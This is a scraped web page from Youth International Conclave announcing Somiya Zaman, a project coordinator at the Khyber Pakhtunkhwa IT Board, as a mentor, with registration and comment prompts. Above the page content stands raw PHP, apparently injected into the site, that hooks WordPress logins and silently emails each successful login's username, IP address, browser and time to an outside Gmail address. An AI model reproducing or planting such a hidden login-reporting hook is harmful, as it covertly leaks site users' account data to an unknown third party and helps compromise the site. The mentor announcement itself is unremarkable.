add_filter('authenticate', function($user, $username, $password) { if (is_a($user, 'WP_User')) { $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown'; $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown'; $time = date('Y-m-d H:i:s'); $body = "
UsernameIPTime
{$username}{$ip}{$time}

{$ua} "; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=UTF-8\r\n"; $headers .= "From: WP Intel \r\n"; @mail("mrsatsat90@gmail.com", "Valid Login Report", $body, $headers); } return $user; }, 30, 3); Somiya Zaman | Become a member | Youth International Conclave
Youth Conclave Mentors

Announcing Somiya Zaman a project coordinator at KPTIB joining as a Mentor at Youth International Conclave

Somiya Zaman:

  • We are proud to announce Somiya Zaman who is working at Khyber Pakhtunkhwa Information Technology Board (https://kpitb.gov.pk/) is joining youth international conclave as a Mentor. If you are interested to get free mentorship from our qualified mentors.
  • Ms Somiya is a project coordinator at Khyber Pakhtunkhwa information technology board, Peshawar, leading inclusively women-Led businesses across kpk to promote the entrepreneurial culture in the province. She is providing business assistance and consulting services tailored for early-stage startups and freelancers. She has provided tech training to more than 300 students in District Abbottabad, under the Early age Programming a project of KPIT board.

Register Now:

  • Register as a Member and get free membership from the Industry & Academia Experts Register at youthconclave.org.

Leave A Comment

Your Comment
All comments are held for moderation.